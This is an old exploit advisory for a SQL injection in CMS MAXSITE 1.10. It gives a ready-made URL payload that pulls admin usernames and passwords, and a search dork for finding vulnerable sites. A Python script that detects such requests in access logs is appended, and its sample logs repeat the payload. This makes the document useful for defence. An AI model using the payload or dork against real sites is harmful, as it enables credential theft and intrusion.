# Title : CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
# Published : 2008-05-26
# Author : Tesz
#########################################################################
CMS MAXSITE Remote SQL Injection Exploit <= 1.10
#########################################################################
[+] Author: Tesz [@] THD
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php
[+] Download: http://maxsite.geniuscyber.com/index.php?name=index
[+] Dork: MAXSITE or intitle:"MAXSITE"
[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*
[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*
[+] Greetz: krit,Exploiters,PongZ,{OHM},Usermode,windows98SE,azazel,Mr`Ping,Os555,[T]he[S]hak
[+] Special Thx: THD (Thaishadow Team)
###########################################################################
# www.Syue.com [2008-05-26]
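
Detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web-server access logs for `name=webboard` requests whose `category` value is not a plain integer. It assumes combined-format logs and that legitimate `category` values are numeric (as in `category=1`); the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2008:10:00:01 +0000] "GET /index.php?name=webboard&category=3 HTTP/1.1" 200 5120
203.0.113.9 - - [26/May/2008:10:00:07 +0000] "GET /index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/* HTTP/1.1" 200 812
203.0.113.9 - - [26/May/2008:10:00:09 +0000] "GET /index.php?name=webboard&category=1%20UNION%20SELECT%201 HTTP/1.1" 200 640
203.0.113.7 - - [26/May/2008:10:00:12 +0000] "GET /index.php?name=news&category=abc HTTP/1.1" 200 2048
"""

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Keywords seen in the advisory's payload; used only to label the finding.
SQL_WORDS = re.compile(r"\b(union|select|concat|from)\b", re.I)
# Assumption: a legitimate category id is a plain decimal integer.
INTEGER = re.compile(r"[0-9]+")


def suspicious_requests(log_text):
    """Return (client, decoded category value, reason) for each webboard
    request whose category parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes values, so '+' and %20 both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("name", [""])[0] != "webboard":
            continue
        for value in params.get("category", []):
            if INTEGER.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_WORDS.search(value) else "non-integer"
            hits.append((client, value, reason))
    return hits


if __name__ == "__main__":
    for client, value, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

The same integer check, applied server-side to `category` before it reaches the query, is the corresponding fix.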